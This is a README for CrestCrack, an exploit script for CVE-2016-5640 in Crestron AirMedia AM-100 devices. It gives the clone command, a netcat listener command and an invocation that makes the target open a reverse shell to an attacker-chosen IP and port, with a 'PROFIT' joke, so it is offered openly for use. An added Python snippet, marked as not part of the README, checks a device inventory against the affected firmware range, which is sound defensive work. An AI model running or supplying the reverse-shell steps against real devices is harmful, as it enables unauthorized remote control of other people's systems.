Exploits CVE-2016-5640 / CLVA-2016-05-002 against Crestron AM-100

CrestCrack

CrestCrack is a simple script that exploits CVE-2016-5640 / CLVA-2016-05-002 in the Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1). When supplied with arguments, CrestCrack uses netcat to create a reverse shell between your target and a netcat listener of your choice.

Setup:

  1. Clone a copy of CrestCrack: `git clone https://github.com/vpnguy/CrestCrack`
  2. Launch a netcat listener: `nc -lvp 1337`
  3. Execute CrestCrack against your target with your listener info: `./crestcrack.py https://targethost 255.255.255.255 1337`
  4. ??????
  5. PROFIT

### Usage: ./crestcrack.py [target host] [listener IP] [listener port]

### Example: ./crestcrack.py https://targethost 123.123.123.123 3311

Additional Vulnerability Information:

Cylance Vulnerability Disclosure

NIST CVE-2016-5640
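
For checking a device inventory against the affected range stated above (AM-100, v1.1.1.11 through v1.2.1), the following is an added example and not part of CrestCrack or its README. The CSV columns, host names, the `EXAMPLE-MODEL` entry and the four-component version padding are assumptions.

```python
import csv
import io

# Affected range as stated in the README: AM-100, v1.1.1.11 through v1.2.1.
AFFECTED_MODEL = "AM-100"
AFFECTED_MIN = "1.1.1.11"
AFFECTED_MAX = "1.2.1"
WIDTH = 4  # assumption: pad to four components so "1.2.1" equals "1.2.1.0"

# Constructed inventory; host names and the non-AM-100 model are made up.
SAMPLE_INVENTORY = """\
host,model,firmware
am-lobby,AM-100,1.1.1.11
am-boardroom,AM-100,v1.2.1
am-lab,AM-100,1.1.1.10
am-annex,AM-100,1.2.1.0
am-hall,AM-100,1.3.0.0
am-unknown,AM-100,unknown
panel-1,EXAMPLE-MODEL,1.2.0
"""


def parse_version(text):
    """Turn 'v1.2.1' into (1, 2, 1, 0); raise ValueError if not dotted digits."""
    parts = text.strip().lstrip("vV").split(".")
    if len(parts) > WIDTH or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable firmware version: {text!r}")
    nums = [int(p) for p in parts]
    return tuple(nums + [0] * (WIDTH - len(nums)))


def is_affected(model, firmware):
    """True when model and firmware fall inside the README's affected range."""
    if model.strip().upper() != AFFECTED_MODEL:
        return False
    low, high = parse_version(AFFECTED_MIN), parse_version(AFFECTED_MAX)
    return low <= parse_version(firmware) <= high


def triage(inventory_csv):
    """Return (affected, unknown) host lists from host,model,firmware CSV text."""
    affected, unknown = [], []
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        try:
            if is_affected(row["model"], row["firmware"]):
                affected.append(row["host"])
        except ValueError:
            unknown.append(row["host"])  # AM-100 with unreadable version: check by hand
    return affected, unknown
```

Calling `triage(SAMPLE_INVENTORY)` returns the hosts inside the range and, separately, the AM-100 units whose firmware string could not be parsed.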

To be added:

  • Error handling/bounds checking
  • Enhanced argument support
  • --help output